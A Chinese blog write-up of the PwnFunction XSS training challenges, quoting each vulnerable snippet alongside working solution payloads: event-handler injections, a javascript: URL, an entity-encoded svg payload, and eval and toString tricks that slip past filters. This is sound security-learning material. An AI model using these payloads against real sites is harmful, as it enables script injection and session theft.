XSS Pwnfunction

Pwnfunction

Ma Spaghet!

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

</h2><img%20src=x%20onerror=alert(1773)>

官方POC:

<svg onload=alert(1337)>

Jefff

<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

问题:使用以下POC,在控制台正常弹出,但是在页面中显示错误

1";alert(1337));//`

image-20200121213312138 显示未闭合末尾的双引号,不解

官方POC:

"-alert(1337)-"

在JS中减号-两边都是一个表达式会执行,因此如下代码会执行弹出1337

Ugandan Knuckles

<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

POC:

dd"%20onmouseover=alert(1)%20x="

X为位置位于属性内,常使用以下几种Payload:

  • autofocus onfocus=alert(1)
  • autofocus onfocus=alert(1)//
  • onbeforescriptexecute=alert(1)//
  • onmouseover=alert(1)//
  • autofocus onblur=alert(1)

Me and the Boys

<!-- Challenge -->
<form id="joinForm" method="GET">
    <input name="joinBoys" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    joinForm.action = (new URL(location).searchParams.get('boys') || '#')
    setTimeout(_ => {
        joinForm.submit()
    }, 2000)
</script>

POC:

javascript:alert(1)

载入URL的标签属性一般使用伪协议运行JS代码

Ah That's Hawt

<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

过滤了( ) ` \

未作出

浏览器解析顺序:URL 解析器->HTML 解析器-> CSS 解析器->JS解析器

官方POC:

%3Csvg%20onload%3D%22%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x33%3B%26%23x33%3B%26%23x37%3B%26%23x29%3B%22%3E

Ligma

/* Challenge */
balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)

过滤了字符和数字

官方利用的JSFuck,但是我并没有实验成功

Mafia

/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

官方POC:

POC1:

Function(/ALERT(1337)/.source.toLowerCase())()

source返回ALERT(1337)

POC2:

eval(8680439..toString(30))(1337)

介绍JS两个函数:parseInt和toString

parseInt('alert',30)
8680439
8680439..toString(30)
alert

POC3:

eval(location.hash.slice(1))

再把#alert(1337)加入URL

Ok, Boomer

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

Tips

Area 51

<!-- Challenge -->
<div id="pwnme"></div>

<script>
    var input = (new URL(location).searchParams.get('debug') || '').replace(/[\!\-\/\#\&\;\%]/g, '_');
    var template = document.createElement('template');
    template.innerHTML = input;
    pwnme.innerHTML = "<!-- <p> DEBUG: " + template.outerHTML + " </p> -->";
</script>

posted @ 2020-04-26 22:51  v1ce0ye  阅读(555)  评论(0编辑  收藏  举报